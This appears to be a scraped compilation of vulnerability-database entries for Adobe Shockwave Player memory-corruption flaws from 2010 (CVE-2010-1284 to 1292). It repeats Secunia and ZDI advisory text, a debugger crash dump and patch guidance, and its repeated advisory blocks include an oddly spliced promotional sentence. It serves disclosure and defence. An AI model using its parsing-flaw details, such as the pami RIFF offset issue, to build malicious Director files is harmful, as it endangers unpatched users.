Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0105 | CVE-2010-1286 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-1284, CVE-2010-1287, CVE-2010-1289, CVE-2010-1290, and CVE-2010-1291. Adobe Shockwave Player is prone to a memory-corruption vulnerability.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0106 | CVE-2010-1287 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-1284, CVE-2010-1286, CVE-2010-1289, CVE-2010-1290, and CVE-2010-1291. Adobe Shockwave Player is prone to a memory-corruption vulnerability.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0107 | CVE-2010-1288 | Adobe Shockwave Player Vulnerable to buffer overflow |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Buffer overflow in Adobe Shockwave Player before 11.5.7.609 might allow attackers to execute arbitrary code via unspecified vectors.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201005-0111 | CVE-2010-1292 | Adobe Shockwave Player of pami RIFF chunk Arbitrary code execution vulnerability in parsing |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
The implementation of pami RIFF chunk parsing in Adobe Shockwave Player before 11.5.7.609 does not validate a certain value from a file before using it in file-pointer calculations, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted .dir (aka Director) file. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the code responsible for parsing Director files. When the application parses the pami RIFF chunk, it trusts an offset value and seeks into the file data. If provided with signed values in the data at the given offset, the process can be made to incorrectly calculate a pointer and operate on the data at it's location. This can be abused by an attacker to execute arbitrary code under the context of the user running the browser.
Adobe Shockwave Player 11.5.6.606 and prior are vulnerable.
NOTE: This issue was previously discussed in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities) but has been given its own record to better document it. These people now have access to some of the best the Web has to offer - including dazzling 3D games and entertainment, interactive product demonstrations, and online learning applications. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
The vulnerabilities are reported in versions 11.5.6.606 and prior on
Windows and Macintosh.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
-- Vendor Response:
Adobe has issued an update to correct this vulnerability. More
details can be found at:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
-- Disclosure Timeline:
2010-04-08 - Vulnerability reported to vendor
2010-05-11 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201005-0104 | CVE-2010-1284 | Adobe Shockwave Player Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Shockwave Player before 11.5.7.609 allows attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2010-1286, CVE-2010-1287, CVE-2010-1289, CVE-2010-1290, and CVE-2010-1291. Adobe Shockwave Player is prone to multiple remote code-execution vulnerabilities. Failed exploit attempts may cause a denial-of-service condition.
Versions prior to Shockwave Player 11.5.7.609 are vulnerable.
NOTE: These issues were previously covered in BID 40066 (Adobe Shockwave Player APSB10-12 Multiple Remote Vulnerabilities); they have been given their own record to better document them. The vulnerable software fails to sanitize user input when processing .dir files resulting in a crash and overwrite of a few memory registers.<br/><br/> --------------------------------------------------------------------------------<br/><br/><code> (f94.ae4): Access violation - code c0000005 (first chance)<br/> First chance exceptions are reported before any exception handling.<br/> This exception may be expected and handled.<br/> eax=20a0a0a0 ebx=207d004c ecx=00000400 edx=41414140 esi=00000000 edi=a80487d8<br/> eip=68008bd6 esp=0012de4c ebp=00000400 iopl=0 nv up ei pl nz na pe nc<br/> cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206<br/> *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Adobe Director 11\DIRAPI.dll<br/> *** ERROR: Symbol file could not be found. Defaulted to export symbols for DIRAPI.dll - <br/> DIRAPI!Ordinal14+0x3b16:<br/> 68008bd6 2b4f04 sub ecx,dword ptr [edi+4] ds:0023:a80487dc=????????<br/><br/>-----------------------<br/><br/>EAX FFFFFFFF<br/>ECX 41414141<br/>EDX FFFFFFFF<br/>EBX 00000018<br/>ESP 0012F3B4<br/>EBP 02793578<br/>ESI 0012F3C4<br/>EDI 02793578<br/>EIP 69009F1F IML32.69009F1F<br/></code><br/>--------------------------------------------------------------------------------<br/><br/>Tested on: Microsoft Windows XP Professional SP3 (English). ----------------------------------------------------------------------
Looking for a job?
Secunia is hiring skilled researchers and talented developers.
1) A boundary error while processing FFFFFF45h Shockwave 3D blocks
can be exploited to corrupt memory.
2) A signedness error in the processing of Director files can be
exploited to corrupt memory.
3) An array indexing error when processing Director files can be
exploited to corrupt memory.
4) An integer overflow error when processing Director files can be
exploited to corrupt memory.
5) An error when processing asset entries contained in Director files
can be exploited to corrupt memory.
6) A boundary error when processing embedded fonts can be exploited
to cause a heap-based buffer overflow via a specially crafted
Director file.
7) An error when processing Director files can be exploited to
overwrite 4 bytes of memory.
8) An error in the implementation of ordinal function 1409 in
iml32.dll can be exploited to corrupt heap memory via a specially
crafted Director file.
9) An error when processing a 4-byte field inside FFFFFF49h Shockwave
3D blocks can be exploited to corrupt heap memory.
10) An unspecified error can be exploited to corrupt memory.
11) A second unspecified error can be exploited to corrupt memory.
12) A third unspecified error can be exploited to corrupt memory.
13) A fourth unspecified error can be exploited to cause a buffer
overflow.
14) A fifth unspecified error can be exploited to corrupt memory.
15) A sixth unspecified error can be exploited to corrupt memory.
16) A seventh unspecified error can be exploited to corrupt memory.
17) An error when processing signed values encountered while parsing
"pami" RIFF chunks can be exploited to corrupt memory.
SOLUTION:
Update to version 11.5.7.609.
http://get.adobe.com/shockwave/
PROVIDED AND/OR DISCOVERED BY:
1-6) Alin Rad Pop, Secunia Research
The vendor also credits:
2) Nahuel Riva of Core Security Technologies.
3) Chaouki Bekrar of Vupen, Code Audit Labs, and an anonymous person
working with iDefense.
7) Chaouki Bekrar and Sebastien Renaud of Vupen, Code Audit Labs,
Gjoko Krstic of Zero Science Lab, and Chro HD of Fortinet's
FortiGuard Labs.
8, 17) an anonymous person working with ZDI.
9) Chaouki Bekrar of Vupen and an anonymous person working with ZDI.
10) Chaouki Bekrar of Vupen.
11-16) Chro HD of Fortinet's FortiGuard Labs.
CHANGELOG:
2010-05-12: Updated "Extended Description" and added PoCs for
vulnerabilities #2, #3, #4, and #6.
ORIGINAL ADVISORY:
Adobe:
http://www.adobe.com/support/security/bulletins/apsb10-12.html
Secunia Research:
http://secunia.com/secunia_research/2010-17/
http://secunia.com/secunia_research/2010-19/
http://secunia.com/secunia_research/2010-20/
http://secunia.com/secunia_research/2010-22/
http://secunia.com/secunia_research/2010-34/
http://secunia.com/secunia_research/2010-50/
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-087/
http://www.zerodayinitiative.com/advisories/ZDI-10-088/
http://www.zerodayinitiative.com/advisories/ZDI-10-089/
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=869
Code Audit Labs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0137.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0138.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-05/0139.html
Zero Science Lab:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4937.php
Core Security Technologies:
http://www.coresecurity.com/content/adobe-director-invalid-read
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
